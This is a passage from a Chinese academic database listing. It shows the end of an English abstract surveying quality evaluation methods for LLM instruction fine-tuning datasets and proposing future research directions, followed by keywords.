automated and customizable,simplifying the evaluation process.Finally,considering the limitations of current quality evaluation methods,some future research directions are proposed for improvement.These include refining instruction categories,extending evaluation indicators,enhancing human-AI interaction evaluation method,applying agents in instruction quality evaluation,and developing a comprehensive evaluation framework. 展开更多
关键词 Large language models Instruction fine-tuning datasets Quality evaluation Human evaluation Statistics-based evaluation model-based evaluation LLMs-based evaluation
原文传递
上一页 1 2 3 下一页 到第
使用帮助 返回顶部